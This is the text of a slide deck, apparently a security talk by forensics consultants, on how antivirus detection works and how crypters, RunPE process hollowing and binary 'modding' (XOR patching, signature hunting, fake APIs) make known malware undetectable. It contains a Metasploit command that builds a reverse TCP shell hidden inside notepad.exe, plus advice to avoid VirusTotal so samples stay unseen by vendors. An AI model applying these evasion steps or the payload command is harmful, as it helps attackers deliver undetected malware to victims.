2. Whoami
ncd:~ apasamar$ whoami
apasamar
apasamar@incide.es
@apasamar
a.k.a brajan
ncd:~ apasamar$ cat apasamar.cv
Electrical Engineer and Master in
Information Security
Co-founder of INCIDE:
Electronic Evidence Experts
Forensics / Expert Witness Reports
Incident Response
IT Security Auditors and Colsultants
!
ncd:~ apasamar$ rm apasamar.cv
3. what is this about...
• Introduction
• AV’s how they work
• Malware types and AV detection
• Evasion techniques
• Auto-encryption, Polymorfism, Ofuscation, Compresion
• Crypters
• types
• stub
• stub FUD
• Modding techniques
• Resources
8. AV howto
• AntiVirus scan binaries on HARD DISC
• They do not SCAN MEMORY, only binaries
that ‘start’ the running processes
• Scan for signatures: binary sequences @ AV
DataBase
• Look for malicious tecniques (Heuristics):API’s,
functions, XOR, etc
• Sandbox (partial execution):look for decryption
routines, etc
11. AV howto
• Recomended:
“Abusing File Processing in Malware
Detectors for Fun and Profit” (2012)
Suman Jana and Vitaly Shmatikov
The University of Texas at Austin
12. AV howto
• Metasploit Framework (Rapid7)
• Community Edition:
• msfpayload windows/shell/
reverse_tcp LHOST=192.168.1.75
LPORT=4444 R | msfencode -c 5 -e
x86/shikata_ga_nai -x notepad.exe
> notepad2.exe
• Pro Edition:
• Generate AV-evading Dynamic
Payloads
13. types of malware and AV
detection
• Comercial SPY Programms: (white list,
signed)
• e-blaster
• 007
• perfect keylogger
• …
14. • Malware newly created:
• LOW detection (NO known signatures)
• possible heuristic detections
types of malware and AV
detection
15. • Existing Malware: (very well known,
signature and heuristic detections)
• trojans (BiFrost, PoisonIvy,CyberGate,
SpyNet, Darkcomet)
• downloaders
• passwords stealers
• reverse shells
types of malware and AV
detection
16. How can we make undetectable
malware already detected by AV?
• C r y p t e r s:
• Software allows you to encrypt ANY
MALWARE doing it undetectable to
AV.
18. builder / stub
• Builder:
• Is responsible for creating the NEW
EXEcutable, composed of the STUB
and the ENCRYPTED MALWARE
• Stub:
• Its mission is to decrypt and run the
ENCRYPTED MALWARE
25. RunPE o Dynamic Forking
CreateProcess
PROCESs
1 (CREATE_SUSPENDED)
GetThreadContext
PEB EBX
EAX
BaseAddress 1
EP I
+8
PROCESS
2
ReadFile WriteProcessMemoryEP 2
BaseAddress 2
SetThreadContextResumeThread
26. FUD
• Target: FUD Stub (Full UnDetectable)
• From Source Code
• From Binary Code
• ¿How?
• MODDING
27. modding source code
• Manually or using obfuscation tools:
• Function replacement (SPLIT,..)
• Funciones/strings/variables replacement and ofuscation. Use of
rot13 or Hex encoding
• Encrytion: RC4 and XOR are very well known by AV
• Alternatives:TEA, DES, etc
• Alternative RunPE Routines
• Fake APIs
• TLB (Tab Library File)
• Trash code
29. • We have to Undetect STUB, BUILDER is only a tool
used at home, not in the wild
• First of all is to FIND AV SIGNATURES:
• Simple Signatures
• Multiple Signatures
• Heuristic Signatures
modding binary file
31. • ¿What if we use a simple Encrytion/Decrytion
rutine inside the STUB?
stub.exe
EP
Signatures stub.exe
OLD EP
Signatures
NEW EP
Encrypted
Decrytion Rutine
modding binary file
32. • ORIGINAL STUB MULTIPLE AV SCAN
modding binary file
Do NOT use
VirusTotal
for these Scans
or your STUB samples
will be send to
AV Companies :(
33. • ENCRYPTION ROUTINE
• NEW EP
• INSERT ROUTINE
• .text SECTION
• from offset 1050
• to Import Table
modding binary file
34. • ENCRYPTION ROUTINE AT NEW EP
• used only to encrypt .text section (used once)
Set breakpoint here, after encryption routine
modding binary file
40. • RIT Technique
• Find out AV Signature
• If Signture is located at instructions code —>
break flow
• jump to another address (hole in section
where yo can write your code)
• Execute pending instrucionts
• Return/jump to the appropriate instrucion
modding binary file
41. • XOR Tecnique
• Find out AV Signature
• Apply to a byte XOR with any value i.e.
22
• Modify EP or jump to your hole
• Apply XOR 22 to the modified byte
• Return/jump to the appropriate
instrucion
modding binary file
42. Detected bytes (EP):
XOR of the detected bytes:
New EP ( XORs and jump to original EP):
modding binary file
43. other techniques
• Add Fake APIs
• Hex strings edit
• Move/change function calls
• Change funtion call type: by name/by
offset
• Insert detected dll function into Stub
Code
!
45. Avda. Diagonal, 640 6ª Planta
08017 Barcelona (Spain)
info@incide.es
http://www.incide.es
http://www.twitter.com/1NC1D3
http://www.atrapadosporlosbits.com
http://www.youtube.com/incidetube
Companies > INCIDE - Investigación Digital
Tel./Fax. +34 932 546 277 / +34 932 546 314
A NY Q U E S T I O N S ?